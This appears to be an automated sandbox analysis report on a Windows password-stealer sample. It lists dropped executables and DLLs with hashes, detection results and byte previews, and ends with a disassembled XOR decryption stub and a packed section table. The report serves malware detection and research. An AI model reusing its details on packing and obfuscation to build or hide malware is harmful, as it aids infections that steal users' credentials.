                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):257872
                                            Entropy (8bit):6.727482641240852
                                            Encrypted:false
                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):80880
                                            Entropy (8bit):6.920480786566406
                                            Encrypted:false
                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                            MD5:A37EE36B536409056A86F50E67777DD7
                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1867264
                                            Entropy (8bit):7.948887450306887
                                            Encrypted:false
                                            SSDEEP:24576:74f6Di883vDLZapu0L73Rt6UAwALeRk5nS2Ph0+O+hg+GplIL7RCSE04TJ0Yod:ECDOvDMU03uDwALeR6ShyGAL7RLLYod
                                            MD5:93899CE9A453CF1E50E1182DA46190A9
                                            SHA1:32C96D3268208904C56BB25FCEE3C42617BB5F8B
                                            SHA-256:FFC1A91FF34F5402E3F56A3576E7A6361ACDB1EFD2FD956809BA0911F5F7B373
                                            SHA-512:2383F1A904825DA9047C2C3A5929DCE328D0AE49FFD4364FB3D78F168B877AA39AA64F7C5A1C7AA8FC8802D168CF74B07C546FE241A7459C5E09FC303C8CFA25
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af............................. J...........@..........................PJ...........@.................................X...l.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...vtxoxanz.p....0..f..................@...wrlrcnfl......J......X..............@....taggant.0... J.."...\..............@...........................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):685392
                                            Entropy (8bit):6.872871740790978
                                            Encrypted:false
                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):608080
                                            Entropy (8bit):6.833616094889818
                                            Encrypted:false
                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):450024
                                            Entropy (8bit):6.673992339875127
                                            Encrypted:false
                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2046288
                                            Entropy (8bit):6.787733948558952
                                            Encrypted:false
                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2453504
                                            Entropy (8bit):7.985189085109159
                                            Encrypted:false
                                            SSDEEP:49152:vj2rggBXww93BEYE5aPdlWqwjvBrIV5O3/Nz872I:vj4gCyx5aaqwb54561872
                                            MD5:EBE33B40CE854EDD8E39259A1B980A65
                                            SHA1:DB07D27D6EE753C4B0F60EE50C0E052A12095CA3
                                            SHA-256:99E1C640BE9FA28CEE9B185982A47BBBEFE8A699B79A22BFBB97C097FB0AEC31
                                            SHA-512:62948EB0AE2C92118D6F121FEE737926E31A2301AD5CC7A2A1442975113B5EDAE2310F98B08937CC9D9F790E9EF7AF162BACDCB65996D1B090C99BBB3A18BB00
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 45%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L....A.f......................!..... .............@..........................0............@... .. .... .. .......... ....................................... ..........................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@............0x...#..(..................@....data....@!.....<!..4..............@...........................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):257872
                                            Entropy (8bit):6.727482641240852
                                            Encrypted:false
                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):80880
                                            Entropy (8bit):6.920480786566406
                                            Encrypted:false
                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                            MD5:A37EE36B536409056A86F50E67777DD7
                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2453504
                                            Entropy (8bit):7.985189085109159
                                            Encrypted:false
                                            SSDEEP:49152:vj2rggBXww93BEYE5aPdlWqwjvBrIV5O3/Nz872I:vj4gCyx5aaqwb54561872
                                            MD5:EBE33B40CE854EDD8E39259A1B980A65
                                            SHA1:DB07D27D6EE753C4B0F60EE50C0E052A12095CA3
                                            SHA-256:99E1C640BE9FA28CEE9B185982A47BBBEFE8A699B79A22BFBB97C097FB0AEC31
                                            SHA-512:62948EB0AE2C92118D6F121FEE737926E31A2301AD5CC7A2A1442975113B5EDAE2310F98B08937CC9D9F790E9EF7AF162BACDCB65996D1B090C99BBB3A18BB00
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 45%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L....A.f......................!..... .............@..........................0............@... .. .... .. .......... ....................................... ..........................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@............0x...#..(..................@....data....@!.....<!..4..............@...........................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1867264
                                            Entropy (8bit):7.948887450306887
                                            Encrypted:false
                                            SSDEEP:24576:74f6Di883vDLZapu0L73Rt6UAwALeRk5nS2Ph0+O+hg+GplIL7RCSE04TJ0Yod:ECDOvDMU03uDwALeR6ShyGAL7RLLYod
                                            MD5:93899CE9A453CF1E50E1182DA46190A9
                                            SHA1:32C96D3268208904C56BB25FCEE3C42617BB5F8B
                                            SHA-256:FFC1A91FF34F5402E3F56A3576E7A6361ACDB1EFD2FD956809BA0911F5F7B373
                                            SHA-512:2383F1A904825DA9047C2C3A5929DCE328D0AE49FFD4364FB3D78F168B877AA39AA64F7C5A1C7AA8FC8802D168CF74B07C546FE241A7459C5E09FC303C8CFA25
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af............................. J...........@..........................PJ...........@.................................X...l.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...vtxoxanz.p....0..f..................@...wrlrcnfl......J......X..............@....taggant.0... J.."...\..............@...........................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1867264
                                            Entropy (8bit):7.948887450306887
                                            Encrypted:false
                                            SSDEEP:24576:74f6Di883vDLZapu0L73Rt6UAwALeRk5nS2Ph0+O+hg+GplIL7RCSE04TJ0Yod:ECDOvDMU03uDwALeR6ShyGAL7RLLYod
                                            MD5:93899CE9A453CF1E50E1182DA46190A9
                                            SHA1:32C96D3268208904C56BB25FCEE3C42617BB5F8B
                                            SHA-256:FFC1A91FF34F5402E3F56A3576E7A6361ACDB1EFD2FD956809BA0911F5F7B373
                                            SHA-512:2383F1A904825DA9047C2C3A5929DCE328D0AE49FFD4364FB3D78F168B877AA39AA64F7C5A1C7AA8FC8802D168CF74B07C546FE241A7459C5E09FC303C8CFA25
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af............................. J...........@..........................PJ...........@.................................X...l.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... ..).........................@...vtxoxanz.p....0..f..................@...wrlrcnfl......J......X..............@....taggant.0... J.."...\..............@...........................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):0.017262956703125623
                                            Encrypted:false
                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                            Malicious:false
                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):0.017262956703125623
                                            Encrypted:false
                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                            Malicious:false
                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):288
                                            Entropy (8bit):3.4507329493351353
                                            Encrypted:false
                                            SSDEEP:6:IiLAxX4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0l1/ul0ut0:Ib4RKQ13vg7jzvYRQV1Wldt0
                                            MD5:CD16FC6A011E186713C699C068729F2D
                                            SHA1:1B194C7067FD4CD6B02B6542495DB5EEE82F9414
                                            SHA-256:B10B1A01504A80A456DA9345C738065286A60067D83E95ED2661436C39A9F06F
                                            SHA-512:A7D4A209C270BF8AF40894F4899F25EF157BA626A645E2DB76FD7DF56AD09520CEFA220D3DACAFDFBF28E4C87338688166510B789CD66AD5C845E7F96CE5B78A
                                            Malicious:false
                                            Preview:.........$K.m...$*<F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.462946636298409
                                            Encrypted:false
                                            SSDEEP:6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:zXD94+WlLZMM6YFHg+n
                                            MD5:B185D718777FCF24201C6774A5F18875
                                            SHA1:AFAE99FC259275C648A8DB61D8EA6CA804AF2C5E
                                            SHA-256:C52046375052E75D8234DEE456A513285035DC50E2A76C26153FEDE4080BD3AE
                                            SHA-512:1838C5722DA2AB84DC2630C7D6B67981D28269E11EA2F0870FE5F50CBADC614A2DCBB898A8FD392B567364A67BD207DF1D308567DFAB247F35F88147A153EF77
                                            Malicious:false
                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.T..H...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.985189085109159
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe
                                            File size:2'453'504 bytes
                                            MD5:ebe33b40ce854edd8e39259a1b980a65
                                            SHA1:db07d27d6ee753c4b0f60ee50c0e052a12095ca3
                                            SHA256:99e1c640be9fa28cee9b185982a47bbbefe8a699b79a22bfbb97c097fb0aec31
                                            SHA512:62948eb0ae2c92118d6f121fee737926e31a2301ad5cc7a2a1442975113b5edae2310f98b08937cc9d9f790e9ef7af162bacdcb65996d1b090c99bbb3a18bb00
                                            SSDEEP:49152:vj2rggBXww93BEYE5aPdlWqwjvBrIV5O3/Nz872I:vj4gCyx5aaqwb54561872
                                            TLSH:1DB53324ACD16128E1425AB981D1ECBF2D3ACB7C282D16D972B7F50B3A35C54E52D8B3
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L..
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0xfd1620
                                            Entrypoint Section:.data
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x668341F6 [Mon Jul 1 23:55:34 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:001806c33a6e9fe5fbff34bdbd79b591
                                            Instruction
                                            jmp 00007F69D0B5AACAh
                                            add byte ptr [esp+eax], dh
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax-18h], ah
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            pop ebp
                                            sub ebp, 00000010h
                                            sub ebp, 00BD1620h
                                            jmp 00007F69D0B5AAC9h
                                            and dword ptr [ebp+20B8D21Bh], esp
                                            push ss
                                            mov ebp, 81C50300h
                                            ror byte ptr [eax+eax+00h], 00000000h
                                            mov ecx, 000005B1h
                                            mov edx, 2CF2F457h
                                            xor byte ptr [eax], dl
                                            inc eax
                                            dec ecx
                                            jne 00007F69D0B5AABCh
                                            jmp 00007F69D0B5AAC9h
                                            std
                                            xchg eax, esi
                                            call 00007F69AD508788h
                                            fisubr word ptr [ebx+57h]
                                            push edi
                                            push edi
                                            salc
                                            xchg eax, esi
                                            scasd
                                            push edi
                                            push edi
                                            push edi
                                            push esp
                                            call far ED57h : 575753EFh
                                            jnle 00007F69D0B5AB19h
                                            push edi
                                            push edi
                                            mov al, byte ptr [DC9F54B5h]
                                            salc
                                            pop ebx
                                            push edi
                                            push edi
                                            push edi
                                            push esp
                                            xchg eax, edx
                                            pop es
                                            fidiv dword ptr [ebx]
                                            jnc 00007F69D0B5AA6Dh
                                            ficom word ptr [ebx+73h]
                                            aas
                                            jmp 00007F69D0B5AA58h
                                            jnbe 00007F69D0B5AB19h
                                            aas
                                            xor eax, 5657CB03h
                                            jnp 00007F69D0B5AB35h
                                            aas
                                            push dword ptr [ebx+52BF89E1h]
                                            push edi
                                            push edi
                                            push edi
                                            mov esi, 5757577Fh
                                            add al, byte ptr [ebx]
                                            or bl, ah
                                            rcr byte ptr [edi+57h], cl
                                            push edi
                                            push edi
                                            fadd st(2), st(0)
                                            pop ebx
                                            push edi
                                            push edi
                                            push edi
                                            fcomp3 st(2)
                                            inc edi
                                            push edi
                                            push edi
                                            push edi
                                            xchg eax, esi
                                            mov esi, D4556655h
                                            xchg eax, ebp
                                            push ebx
                                            push ds
                                            pop eax
                                            shl byte ptr [ebx+0AA8A8A8h], cl
                                            xchg eax, ebp
                                            pop ebx
                                            push edi
                                            fcomp3 st(3)
                                            jnc 00007F69D0B5AB15h
                                            push edi
                                            Programming Language:
                                            • [C++] VS2010 build 30319
                                            • [ASM] VS2010 build 30319
                                            • [ C ] VS2010 build 30319
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729
                                            • [LNK] VS2010 build 30319
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x9c20200xe91.data
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9c2eb40x20c.data
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x9c20000xc.data
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            0x10000x1b0000xa400adc25c4e0209b7948f0fc3098a129fa5False0.9996665396341463data7.996079938920401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            0x1c0000x80000x4000c8097c533056f3530f3d8608cb451ae7False0.99517822265625data7.982865889891432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            0x240000x2130000x400c61e637ead66cfdb33a0c843806a0354unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
